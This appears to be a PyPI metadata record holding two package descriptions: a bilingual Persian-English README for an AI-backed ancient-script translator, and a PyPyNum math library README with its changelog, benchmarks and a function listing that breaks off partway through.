`AncientReverseAI` یک ماژول پیشرفته و منحصربهفرد است که با استفاده از **هوش مصنوعی معنایی**،
متون باستانی را به **فارسی و انگلیسی قابل فهم** تبدیل میکند.
## ✨ Key Features | ویژگیها
- 🧠 AI-based semantic translation
ترجمه هوشمند و مفهومی با هوش مصنوعی
- 📜 Supports multiple ancient writing systems
پشتیبانی از خطوط باستانی متنوع
- 🌍 Dual output: Persian & English
خروجی همزمان فارسی و انگلیسی
- 🧩 Context-aware translation (not literal)
درک جمله و معنا، نه ترجمه سطحی
- 🔌 Requires Internet & API Key
نیازمند اینترنت و کلید API
## ⚠️ Important Notes | نکات مهم
This is conceptual & historical translation, not glyph decoding
این ترجمه مفهومی است، نه صرفاً بازگردانی کاراکتر
Multiple interpretations may exist for ancient texts
ممکن است یک متن باستانی چند تفسیر معتبر داشته باشد
Best results with complete sentences
بهترین نتیجه با متون کامل و پیوسته حاصل میشود
## 🗂️ Supported Scripts | خطوط پشتیبانیشده
- Cuneiform — خط میخی
- Pahlavi — پهلوی
- Manichaean — مانی
- Hieroglyph — هیروگلیف مصری
- Akkadian — اکدی
- Oracle Bone — استخوان پیشگویی
- Avestan — اوستایی
- Linear B (optional)
## 🚀 Usage Example | نمونه استفاده
```python
from ancient import AncientReverseAI
ai = AncientReverseAI(api_key="YOUR_API_KEY",base_url= "https://ai.liara.ir/api/v1/")
ancient_text = "𒀀𒁀𒂊"
result = ai.translate(
text=ancient_text,
script="cuneiform"
)
print(result)
```
## یاداشت علمی درباره این پروژه:
**1. سایت علمی civilica**
[https://civilica.com/note/17282/](https://civilica.com/note/17282/)
```bash
pip install --upgrade ancientlinesoftheworld
```
| text/markdown | Amir Hossein Khazaei | amirhossinpython03@gmail.com | null | null | MIT | null | [] | [] | https://github.com/amirhossinpython/ancientlinesoftheworld- | null | >=3.8 | [] | [] | [] | [
"deep-translator",
"Pillow",
"openai",
"feedparser",
"Flask"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.11.9 | 2026-02-20T09:36:39.162781 | ancientlinesoftheworld-4.2.2.tar.gz | 4,076,981 | ca/60/428d3251a7433231926d156db54cebbdb0e20812f64b716d983c3010a5ee/ancientlinesoftheworld-4.2.2.tar.gz | source | sdist | null | false | 2ee89d933af9d41071982659cceb0467 | f3cf3e5e634c6942adec62eafde4ece44530509610f0e78713ec121bc5d7291e | ca60428d3251a7433231926d156db54cebbdb0e20812f64b716d983c3010a5ee | null | [] | 212 |
2.4 | PyPyNum | 1.18.0 | PyPyNum is a versatile Python math lib. It features modules for math, data analysis, arrays, crypto, physics, RNG, data proc, stats, eq solving, image proc, interp, matrix calc, and high-prec math. Designed for scientific computing, data science, and ML, it offers efficient, general-purpose tools. | # PyPyNum
PyPyNum is a versatile Python math lib. It features modules for math, data analysis, arrays, crypto, physics, RNG, data
proc, stats, eq solving, image proc, interp, matrix calc, and high-prec math. Designed for scientific computing, data
science, and ML, it offers efficient, general-purpose tools.
```
________ ___ ___ ________ ___ ___ ________ ___ ___ _____ ______
|\ __ \ |\ \ / /||\ __ \ |\ \ / /||\ ___ \ |\ \|\ \ |\ _ \ _ \
\ \ \|\ \\ \ \/ / /\ \ \|\ \\ \ \/ / /\ \ \\ \ \\ \ \\\ \\ \ \\\__\ \ \
\ \ ____\\ \ / / \ \ ____\\ \ / / \ \ \\ \ \\ \ \\\ \\ \ \\|__| \ \
\ \ \___| \/ / / \ \ \___| \/ / / \ \ \\ \ \\ \ \\\ \\ \ \ \ \ \
\ \__\ __/ / / \ \__\ __/ / / \ \__\\ \__\\ \_______\\ \__\ \ \__\
\|__| |\___/ / \|__| |\___/ / \|__| \|__| \|_______| \|__| \|__|
\|___|/ \|___|/
```
[](https://pepy.tech/project/pypynum)
[](https://pepy.tech/project/pypynum)
[](https://pepy.tech/project/pypynum)
## PyPyNum | Version -> 1.18.0 | PyPI -> https://pypi.org/project/PyPyNum/ | Gitee -> https://www.gitee.com/PythonSJL/PyPyNum | GitHub -> https://github.com/PythonSJL/PyPyNum

The logo cannot be displayed on PyPI, it can be viewed in Gitee or GitHub.
### Introduction
+ Multi functional math library, similar to numpy, scipy, etc., designed specifically for PyPy interpreters and also
supports other types of Python interpreters
+ Update versions periodically to add more practical features
+ If you need to contact, please add QQ number 2261748025 (一只水晶兰), or through my email 2261748025@qq.com
```
+++++++++++++++++++++++++++++++++++++++++
+ Tip: +
+ Have suggestions or feature requests? +
+ Feel free to share them with us. +
+ Your feedback is highly appreciated! +
+++++++++++++++++++++++++++++++++++++++++
```
### Copyright and License
This Python library is licensed under the GNU Affero General Public License version 3 (AGPLv3).
The license is designed to ensure that network server software is made available to the community, allowing users to
access the source code of modified versions when the software is used to provide network services.
**Key Terms and Conditions:**
- Source Code: The library must be provided with its source code, and any modifications must also be distributed under
the AGPLv3.
- Free Redistribution: The library can be distributed in source and binary forms without any restrictions.
- No Discrimination: The license does not restrict the use of the software by individuals or organizations, nor does it
discriminate against fields of use.
- No Discrimination Against Persons or Groups: The license does not restrict anyone from receiving the software.
- Patent License: The patent holder must grant a patent license to anyone who uses the software.
- No Surrender of Others' Freedom: The license does not allow any conditions that contradict the AGPLv3.
- Remote Network Interaction: If the software can interact with users remotely, the source code must be made available
at no charge.
- Revised Versions of this License: The Free Software Foundation may publish revised versions of the AGPLv3, and users
have the option to follow the terms of any version.
- Disclaimer of Warranty: There is no warranty for the software, to the extent permitted by applicable law.
- Limitation of Liability: The copyright holder and any other party who modifies and conveys the software are not liable
for damages arising from the use or inability to use the software.
**Full License Text:**
[GNU Affero General Public License](https://www.gnu.org/licenses/agpl-3.0.en.html)
### Name and Function Introduction of Submodules
| Submodule Name | Function Introduction |
|:-------------------:|:------------------------------------------------------------------:|
| `pypynum.arrays` | Provides operations and calculations for multi-dimensional arrays. |
| `pypynum.chars` | Contains a variety of special mathematical characters. |
| `pypynum.ciphers` | Implements various encryption and decryption algorithms. |
| `pypynum.consts` | Contains mathematical and physical constants. |
| `pypynum.crandom` | Generates random complex numbers. |
| `pypynum.dataproc` | Tools for data preprocessing and transformation. |
| `pypynum.dists` | Statistical distribution functions and related calculations. |
| `pypynum.equations` | Solves equations and performs symbolic operations. |
| `pypynum.fft` | Implements Fast Fourier Transforms and related functionalities. |
| `pypynum.files` | File reading and writing tools. |
| `pypynum.geoms` | Geometric shapes and calculation methods. |
| `pypynum.graphs` | Graph theory algorithms and network analysis. |
| `pypynum.groups` | Group theory calculations and structural analysis. |
| `pypynum.hypcmpnms` | Hypercomplex number operations and transformations. |
| `pypynum.images` | Image processing and manipulation tools. |
| `pypynum.interp` | Interpolation methods and function approximation. |
| `pypynum.kernels` | Implementation of kernel functions and methods. |
| `pypynum.logics` | Simulates logical circuits. |
| `pypynum.maths` | Basic mathematical operations and commonly used functions. |
| `pypynum.matrices` | Matrix operations and linear algebra calculations. |
| `pypynum.multiprec` | High-precision numerical computations. |
| `pypynum.networks` | Network models and algorithms. |
| `pypynum.numbers` | Operations on numerical types and properties. |
| `pypynum.plotting` | Data visualization tools. |
| `pypynum.polys` | Polynomial operations and calculations. |
| `pypynum.pprinters` | Advanced printing and formatting output. |
| `pypynum.random` | Generates arrays of random numbers. |
| `pypynum.regs` | Regression analysis and model fitting. |
| `pypynum.seqs` | Computes various mathematical sequences. |
| `pypynum.special` | Provides advanced special functions for mathematical computations. |
| `pypynum.stattest` | Statistical tests and data analysis. |
| `pypynum.symbols` | Symbolic computation and expression manipulation. |
| `pypynum.tensors` | Tensor operations and calculations. |
| `pypynum.test` | Simple code testing for the library. |
| `pypynum.this` | The Zen of the library, expressing its guiding principles. |
| `pypynum.tools` | General tools and helper functions. |
| `pypynum.trees` | Tree structures and algorithm implementations. |
| `pypynum.types` | Contains various types, exceptions, and configurations. |
| `pypynum.ufuncs` | Universal functions and vectorized operations. |
| `pypynum.utils` | Utility programs and auxiliary functions. |
| `pypynum.vectors` | Vector operations and calculations. |
| `pypynum.zh_cn` | Provides Chinese language interfaces for various functionalities. |
### The Zen of PyPyNum (Preview)
```
The Zen of PyPyNum, by Shen Jiayi
In this mathematical sanctuary, we weave our algorithms with pure Python threads.
Precision outweighs approximation.
Elegance in mathematics transcends the bulky algorithms.
Clarity in logic illuminates the darkest problems.
Simplicity in form is the pinnacle of sophistication.
Flat hierarchies in our code mirror the linear nature of functions.
Sparse code, like a minimal polynomial, retains essence without redundancy.
```
```
...
Do you want to view all the content?
Enter "from pypynum import this" in your
Python interpreter and run it!
```
```
September 5, 2024
```
### Functional Changes Compared to the Previous Version
```
!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=
PyPyNum version 1.18.0 has undergone the following functional changes compared to version 1.17.2:
1. `arrays` Module
a. Fixed reflection operation errors in the `Array` class.
2. `ciphers` Module
a. The `base_64` function's input parameter and return type have been changed from `str` to `bytes`.
3. `groups` Module
a. The `Group` class has been refactored and new available methods have been added.
b. The `group` function now accepts an additional `operation` parameter.
4. `images` Module
a. Added a new class `JPEG` for JPEG image handling.
b. Added JPEG processing functions: `jpeg_adjust_qtable`, `jpeg_category`, `jpeg_channel_encoding`,
`jpeg_chroma_dc_huff`, `jpeg_dct8x8`, `jpeg_decode_pixels`, `jpeg_encode_pixels`, `jpeg_luma_dc_huff`,
`jpeg_rle_decoding`, `jpeg_rle_encoding`, `jpeg_split_pixels`, and `jpeg_zigzag`.
c. Added color space conversion functions `rgb2ycbcr` and `ycbcr2rgb` (which are JPEG-related functions).
d. Added `entropy` function (which is a PNG function).
e. Added PNG filter functions `png_apply_filter` and `png_reverse_filter`, allowing the `apply_filter` parameter
to be specified during writing to compress the generated file size.
5. `kernels` Module
a. Added `matmul8x8kernel` function for 8x8 matrix multiplication kernel operations.
6. `maths` Module
a. Added `dsigmoid` function.
b. Updated `sumprod` function with a new `floating` parameter.
7. `matrices` Module
a. Added `dctmtx` function to generate a discrete cosine transform matrix.
8. `numbers` Module
a. Added `round_sigfig` function.
b. Added `words2int` function to convert English words to integers.
9. `plotting` Module
a. Renamed the `color` function to `colortext`.
10. `seqs` Module
a. Updated `stirling1` function with a new `sign` parameter.
11. `special` Module
a. Added `ellipe` and `ellipk` functions for complete elliptic integrals.
12. `symbols` Module
a. Added `Expr` class.
b. Added `build_expr_tree`, `infix2postfix`, and `tokenize` functions.
c. The `parse_expr` function now returns an `Expr` object (previously returned a `list`).
13. `ufuncs` Module
a. Renamed comparison functions to follow more explicit naming conventions:
i. `eq` renamed to `equal`
ii. `ge` renamed to `greater_equal`
iii. `gt` renamed to `greater_than`
iv. `le` renamed to `less_equal`
v. `lt` renamed to `less_than`
vi. `ne` renamed to `not_equal`
!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=!=
```
### Run Time Test
Python interpreter version
+ CPython 3.8.10
+ PyPy 3.10.12
| Matrix Time Test | NumPy+CPython (seconds) | Ranking | PyPyNum+PyPy (seconds) | Ranking | Mpmath_+_PyPy_ (seconds) | Ranking | SymPy_+_PyPy_ (seconds) | Ranking |
|------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------|
| Create a hundred order random number matrix | 0.000083 | 1 | 0.005374 | 2 | 0.075253 | 3 | 0.230530 | 4 |
| Create a thousand order random number matrix | 0.006740 | 1 | 0.035666 | 2 | 1.200950 | 3 | 4.370265 | 4 |
| Addition of matrices of order one hundred | 0.000029 | 1 | 0.002163 | 2 | 0.045641 | 4 | 0.035700 | 3 |
| Adding matrices of order one thousand | 0.002647 | 1 | 0.019111 | 2 | 1.746957 | 4 | 0.771542 | 3 |
| Determinant of a hundred order matrix | 0.087209 | 2 | 0.016331 | 1 | 4.354507 | 3 | 5.157206 | 4 |
| Determinant of a thousand order matrix | 0.616113 | 1 | 3.509747 | 2 | It takes a long time | 3 | It takes a long time | 4 |
| Finding the inverse of a hundred order matrix | 0.162770 | 2 | 0.015768 | 1 | 8.162948 | 3 | 21.437424 | 4 |
| Finding the inverse of a thousand order matrix | 0.598905 | 1 | 17.072552 | 2 | It takes a long time | 3 | It takes a long time | 4 |
| Array output effect | ```[[[[ -7 -67]```<br>```[-78 29]]```<br><br>```[[-86 -97]```<br>```[ 68 -3]]]```<br><br><br>```[[[ 11 42]```<br>```[ 24 -65]]```<br><br>```[[-60 72]```<br>```[ 73 2]]]]``` | / | ```[[[[ 37 83]```<br>```[ 40 2]]```<br><br>```[[ -5 -34]```<br>```[ -7 72]]]```<br><br><br>```[[[ 13 -64]```<br>```[ 6 90]]```<br><br>```[[ 68 57]```<br>```[ 78 11]]]]``` | / | ```[-80.0 -8.0 80.0 -88.0]```<br>```[-99.0 -43.0 87.0 81.0]```<br>```[ 20.0 -55.0 98.0 8.0]```<br>```[ 8.0 44.0 64.0 -35.0]```<br><br>(Only supports matrices) | / | ```⎡⎡16 -56⎤ ⎡ 8 -28⎤⎤```<br>```⎢⎢ ⎥ ⎢ ⎥⎥```<br>```⎢⎣-56 56 ⎦ ⎣-28 28 ⎦⎥```<br>```⎢ ⎥```<br>```⎢ ⎡-2 7 ⎤ ⎡-18 63 ⎤⎥```<br>```⎢ ⎢ ⎥ ⎢ ⎥⎥```<br>```⎣ ⎣7 -7⎦ ⎣63 -63⎦⎦``` | / |
### Basic Structure
```
PyPyNum
├── arrays
│ ├── CLASS
│ │ ├── Array(object)/__init__(self: Any, data: Any, check: Any) -> Any
│ │ └── BoolArray(pypynum.arrays.Array)/__init__(self: Any, data: Any, check: Any) -> Any
│ └── FUNCTION
│ ├── array(data: Any) -> Any
│ ├── asarray(data: Any) -> Any
│ ├── aslist(data: Any) -> Any
│ ├── boolarray(data: Any) -> Any
│ ├── fill(shape: typing.Union[list, tuple], sequence: typing.Union[list, tuple, str], repeat: bool, pad: typing.Any, rtype: typing.Callable) -> typing.Any
│ ├── full(shape: typing.Union[list, tuple], fill_value: typing.Any, rtype: typing.Callable) -> typing.Any
│ ├── full_like(a: typing.Any, fill_value: typing.Any, rtype: typing.Callable) -> typing.Any
│ ├── get_shape(data: Any) -> Any
│ ├── is_valid_array(_array: Any, _shape: Any) -> Any
│ ├── ones(shape: typing.Union[list, tuple], rtype: typing.Callable) -> typing.Any
│ ├── ones_like(a: typing.Any, rtype: typing.Callable) -> typing.Any
│ ├── tensorproduct(tensors: pypynum.arrays.Array) -> pypynum.arrays.Array
│ ├── zeros(shape: typing.Union[list, tuple], rtype: typing.Callable) -> typing.Any
│ └── zeros_like(a: typing.Any, rtype: typing.Callable) -> typing.Any
├── chars
│ ├── CLASS
│ └── FUNCTION
│ ├── int2subscript(standard_str: str) -> str
│ ├── int2superscript(standard_str: str) -> str
│ ├── subscript2int(subscript_str: str) -> str
│ └── superscript2int(superscript_str: str) -> str
├── ciphers
│ ├── CLASS
│ └── FUNCTION
│ ├── atbash(text: str) -> str
│ ├── base_64(text: bytes, decrypt: bool) -> bytes
│ ├── caesar(text: str, shift: int, decrypt: bool) -> str
│ ├── hill256(text: bytes, key: list, decrypt: bool) -> bytes
│ ├── ksa(key: bytes) -> list
│ ├── morse(text: str, decrypt: bool) -> str
│ ├── playfair(text: str, key: str, decrypt: bool) -> str
│ ├── prga(s: list) -> Any
│ ├── rc4(text: bytes, key: bytes) -> bytes
│ ├── rot13(text: str) -> str
│ ├── substitution(text: str, sub_map: dict, decrypt: bool) -> str
│ └── vigenere(text: str, key: str, decrypt: bool) -> str
├── consts
│ ├── CLASS
│ └── FUNCTION
├── crandom
│ ├── CLASS
│ └── FUNCTION
│ ├── randint_polar(left: int, right: int, mod: typing.Union[int, float], angle: typing.Union[int, float]) -> complex
│ ├── randint_rect(left: int, right: int, real: typing.Union[int, float], imag: typing.Union[int, float]) -> complex
│ ├── random_polar(mod: typing.Union[int, float], angle: typing.Union[int, float]) -> complex
│ ├── random_rect(real: typing.Union[int, float], imag: typing.Union[int, float]) -> complex
│ ├── uniform_polar(left: typing.Union[int, float], right: typing.Union[int, float], mod: typing.Union[int, float], angle: typing.Union[int, float]) -> complex
│ └── uniform_rect(left: typing.Union[int, float], right: typing.Union[int, float], real: typing.Union[int, float], imag: typing.Union[int, float]) -> complex
├── dataproc
│ ├── CLASS
│ │ └── Series(object)/__init__(self: Any, data: typing.Any, index: typing.Any) -> None
│ └── FUNCTION
├── dists
│ ├── CLASS
│ └── FUNCTION
│ ├── beta_pdf(x: Any, a: Any, b: Any) -> Any
│ ├── binom_pmf(k: Any, n: Any, p: Any) -> Any
│ ├── cauchy_cdf(x: Any, x0: Any, gamma: Any) -> Any
│ ├── cauchy_pdf(x: Any, x0: Any, gamma: Any) -> Any
│ ├── chi2_cdf(x: Any, df: Any) -> Any
│ ├── chi2_pdf(x: Any, df: Any) -> Any
│ ├── expon_cdf(x: Any, scale: Any) -> Any
│ ├── expon_pdf(x: Any, scale: Any) -> Any
│ ├── f_pdf(x: Any, dfnum: Any, dfden: Any) -> Any
│ ├── gamma_pdf(x: Any, shape: Any, scale: Any) -> Any
│ ├── geometric_pmf(k: Any, p: Any) -> Any
│ ├── hypergeom_pmf(k: Any, mg: Any, n: Any, nt: Any) -> Any
│ ├── invgauss_pdf(x: Any, mu: Any, lambda_: Any, alpha: Any) -> Any
│ ├── levy_pdf(x: Any, c: Any) -> Any
│ ├── log_logistic_cdf(x: Any, alpha: Any, beta: Any) -> Any
│ ├── log_logistic_pdf(x: Any, alpha: Any, beta: Any) -> Any
│ ├── logistic_cdf(x: Any, mu: Any, s: Any) -> Any
│ ├── logistic_pdf(x: Any, mu: Any, s: Any) -> Any
│ ├── lognorm_cdf(x: Any, mu: Any, sigma: Any) -> Any
│ ├── lognorm_pdf(x: Any, s: Any, scale: Any) -> Any
│ ├── logser_pmf(k: Any, p: Any) -> Any
│ ├── multinomial_pmf(k: Any, n: Any, p: Any) -> Any
│ ├── nbinom_pmf(k: Any, n: Any, p: Any) -> Any
│ ├── nhypergeom_pmf(k: Any, m: Any, n: Any, r: Any) -> Any
│ ├── normal_cdf(x: Any, mu: Any, sigma: Any) -> Any
│ ├── normal_pdf(x: Any, mu: Any, sigma: Any) -> Any
│ ├── pareto_pdf(x: Any, k: Any, m: Any) -> Any
│ ├── poisson_pmf(k: Any, mu: Any) -> Any
│ ├── rayleigh_pdf(x: Any, sigma: Any) -> Any
│ ├── t_pdf(x: Any, df: Any) -> Any
│ ├── uniform_cdf(x: Any, loc: Any, scale: Any) -> Any
│ ├── uniform_pdf(x: Any, loc: Any, scale: Any) -> Any
│ ├── vonmises_pdf(x: Any, mu: Any, kappa: Any) -> Any
│ ├── weibull_max_pdf(x: Any, c: Any, scale: Any, loc: Any) -> Any
│ ├── weibull_min_pdf(x: Any, c: Any, scale: Any, loc: Any) -> Any
│ └── zipf_pmf(k: Any, s: Any, n: Any) -> Any
├── equations
│ ├── CLASS
│ └── FUNCTION
│ ├── lin_eq(left: list, right: list) -> list
│ └── poly_eq(coefficients: list) -> list
├── fft
│ ├── CLASS
│ │ └── FT1D(object)/__init__(self: Any, data: Any) -> Any
│ └── FUNCTION
├── files
│ ├── CLASS
│ └── FUNCTION
│ ├── read(file: str) -> list
│ └── write(file: str, cls: object) -> Any
├── geoms
│ ├── CLASS
│ │ ├── Circle(object)/__init__(self: Any, center: typing.Union[list, tuple], radius: typing.Union[int, float]) -> Any
│ │ ├── Line(object)/__init__(self: Any, a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> Any
│ │ ├── Point(object)/__init__(self: Any, p: typing.Union[list, tuple]) -> Any
│ │ ├── Polygon(object)/__init__(self: Any, p: typing.Union[list, tuple]) -> Any
│ │ ├── Quadrilateral(object)/__init__(self: Any, a: typing.Union[list, tuple], b: typing.Union[list, tuple], c: typing.Union[list, tuple], d: typing.Union[list, tuple]) -> Any
│ │ └── Triangle(object)/__init__(self: Any, a: typing.Union[list, tuple], b: typing.Union[list, tuple], c: typing.Union[list, tuple]) -> Any
│ └── FUNCTION
│ └── distance(g1: Any, g2: Any, error: typing.Union[int, float]) -> float
├── graphs
│ ├── CLASS
│ │ ├── BaseGraph(object)/__init__(self: Any) -> Any
│ │ ├── BaseWeGraph(pypynum.graphs.BaseGraph)/__init__(self: Any) -> Any
│ │ ├── DiGraph(pypynum.graphs.BaseGraph)/__init__(self: Any) -> Any
│ │ ├── UnGraph(pypynum.graphs.BaseGraph)/__init__(self: Any) -> Any
│ │ ├── WeDiGraph(pypynum.graphs.BaseWeGraph)/__init__(self: Any) -> Any
│ │ └── WeUnGraph(pypynum.graphs.BaseWeGraph)/__init__(self: Any) -> Any
│ └── FUNCTION
├── groups
│ ├── CLASS
│ │ └── Group(object)/__init__(self: Any, data: Any, operation: Any) -> Any
│ └── FUNCTION
│ └── group(data: Any, operation: Any) -> Any
├── hypcmpnms
│ ├── CLASS
│ │ ├── Euler(object)/__init__(self: Any, y: typing.Union[int, float], p: typing.Union[int, float], r: typing.Union[int, float]) -> Any
│ │ ├── Octonion(object)/__init__(self: Any, s: typing.Union[int, float], t: typing.Union[int, float], u: typing.Union[int, float], v: typing.Union[int, float], w: typing.Union[int, float], x: typing.Union[int, float], y: typing.Union[int, float], z: typing.Union[int, float]) -> Any
│ │ └── Quaternion(object)/__init__(self: Any, w: typing.Union[int, float], x: typing.Union[int, float], y: typing.Union[int, float], z: typing.Union[int, float]) -> Any
│ └── FUNCTION
│ ├── convert(data: typing.Union[pypynum.hypcmpnms.Quaternion, pypynum.matrices.Matrix, pypynum.hypcmpnms.Euler], to: str) -> typing.Union[pypynum.hypcmpnms.Quaternion, pypynum.matrices.Matrix, pypynum.hypcmpnms.Euler]
│ ├── euler(yaw: typing.Union[int, float], pitch: typing.Union[int, float], roll: typing.Union[int, float]) -> pypynum.hypcmpnms.Euler
│ ├── octo(s: typing.Union[int, float], t: typing.Union[int, float], u: typing.Union[int, float], v: typing.Union[int, float], w: typing.Union[int, float], x: typing.Union[int, float], y: typing.Union[int, float], z: typing.Union[int, float]) -> pypynum.hypcmpnms.Octonion
│ └── quat(w: typing.Union[int, float], x: typing.Union[int, float], y: typing.Union[int, float], z: typing.Union[int, float]) -> pypynum.hypcmpnms.Quaternion
├── images
│ ├── CLASS
│ │ ├── BMP(pypynum.images.BaseImage)/__init__(self: Any) -> None
│ │ ├── BaseImage(object)/__init__(self: Any) -> None
│ │ ├── JPEG(pypynum.images.BaseImage)/__init__(self: Any) -> None
│ │ └── PNG(pypynum.images.BaseImage)/__init__(self: Any) -> None
│ └── FUNCTION
│ ├── entropy(data: typing.Any) -> float
│ ├── jpeg_adjust_qtable(qtable: typing.Union[list, tuple], quality: int) -> list
│ ├── jpeg_category(data: typing.Any, reverse: bool) -> typing.Any
│ ├── jpeg_channel_encoding(matrix: list, quality: int, mode: int) -> tuple
│ ├── jpeg_chroma_dc_huff(data: typing.Any, reverse: bool) -> typing.Any
│ ├── jpeg_dct8x8(block: typing.Union[list, tuple], reverse: bool) -> list
│ ├── jpeg_decode_pixels(scan_data: bytes, lqtable: list, cqtable: list, width: int, height: int) -> list
│ ├── jpeg_encode_pixels(pixels: typing.Union[list, tuple], quality: int) -> tuple
│ ├── jpeg_luma_dc_huff(data: typing.Any, reverse: bool) -> typing.Any
│ ├── jpeg_rle_decoding(sequence: typing.Union[list, tuple]) -> list
│ ├── jpeg_rle_encoding(sequence: typing.Union[list, tuple]) -> list
│ ├── jpeg_split_pixels(matrix: list) -> list
│ ├── jpeg_zigzag(data: typing.Union[list, tuple], reverse: bool) -> list
│ ├── png_apply_filter(pixels: list, above_pixels: list, filter_type: int) -> list
│ ├── png_reverse_filter(pixels: list, above_pixels: list, filter_type: int) -> list
│ ├── rgb2ycbcr(weights: typing.Union[list, tuple]) -> tuple
│ └── ycbcr2rgb(weights: typing.Union[list, tuple]) -> tuple
├── interp
│ ├── CLASS
│ └── FUNCTION
│ ├── bicubic(x: Any) -> Any
│ ├── contribute(src: Any, x: Any, y: Any, channels: Any) -> Any
│ ├── interp1d(data: typing.Union[list, tuple], length: int) -> list
│ └── interp2d(src: Any, new_height: Any, new_width: Any, channels: Any, round_res: Any, min_val: Any, max_val: Any) -> Any
├── kernels
│ ├── CLASS
│ └── FUNCTION
│ ├── det2x2kernel(a: typing.Union[list, tuple]) -> float
│ ├── det3x3kernel(a: typing.Union[list, tuple]) -> float
│ ├── det4x4kernel(a: typing.Union[list, tuple]) -> float
│ ├── eigen2x2kernel(a: typing.Union[list, tuple]) -> tuple
│ ├── inv2x2kernel(a: typing.Union[list, tuple]) -> list
│ ├── inv3x3kernel(a: typing.Union[list, tuple]) -> list
│ ├── inv4x4kernel(a: typing.Union[list, tuple]) -> list
│ ├── lu2x2kernel(a: typing.Union[list, tuple]) -> tuple
│ ├── lu3x3kernel(a: typing.Union[list, tuple]) -> tuple
│ ├── lu4x4kernel(a: typing.Union[list, tuple]) -> tuple
│ ├── matexp2x2kernel(a: typing.Union[list, tuple]) -> list
│ ├── matmul2x2kernel(a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> list
│ ├── matmul3x3kernel(a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> list
│ ├── matmul4x4kernel(a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> list
│ ├── matmul8x8kernel(a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> list
│ └── matpow2x2kernel(a: typing.Union[list, tuple], n: typing.Union[int, float, complex]) -> list
├── logics
│ ├── CLASS
│ │ ├── AND(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── Basic(object)/__init__(self: Any, label: Any) -> Any
│ │ ├── Binary(pypynum.logics.Basic)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── COMP(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── DFF(pypynum.logics.Unary)/__init__(self: Any, label: Any, pin0: Any, state: Any) -> Any
│ │ ├── FullAdder(pypynum.logics.Ternary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any) -> Any
│ │ ├── FullSuber(pypynum.logics.Ternary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any) -> Any
│ │ ├── HalfAdder(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── HalfSuber(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── JKFF(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, state: Any) -> Any
│ │ ├── NAND(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── NOR(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── NOT(pypynum.logics.Unary)/__init__(self: Any, label: Any, pin0: Any) -> Any
│ │ ├── OR(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── Quaternary(pypynum.logics.Basic)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any, pin3: Any) -> Any
│ │ ├── TFF(pypynum.logics.Unary)/__init__(self: Any, label: Any, pin0: Any, state: Any) -> Any
│ │ ├── Ternary(pypynum.logics.Basic)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any) -> Any
│ │ ├── TwoBDiver(pypynum.logics.Quaternary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any, pin3: Any) -> Any
│ │ ├── TwoBMuler(pypynum.logics.Quaternary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any, pin3: Any) -> Any
│ │ ├── Unary(pypynum.logics.Basic)/__init__(self: Any, label: Any, pin0: Any) -> Any
│ │ ├── XNOR(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ └── XOR(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ └── FUNCTION
│ └── connector(previous: Any, latter: Any) -> Any
├── maths
│ ├── CLASS
│ └── FUNCTION
│ ├── arrangement(n: int, r: int) -> int
│ ├── combination(n: int, r: int) -> int
│ ├── acos(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acosh(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acot(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acoth(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acsc(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acsch(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── arrangement(n: int, r: int) -> int
│ ├── asec(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── asech(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── asin(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── asinh(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── atan(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── atanh(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── average(data: typing.Union[list, tuple], weights: typing.Union[list, tuple]) -> float
│ ├── beta(p: typing.Union[int, float], q: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── central_moment(data: typing.Union[list, tuple], order: int) -> float
│ ├── coeff_det(x: typing.Union[list, tuple], y: typing.Union[list, tuple]) -> typing.Union[int, float, complex]
│ ├── combination(n: int, r: int) -> int
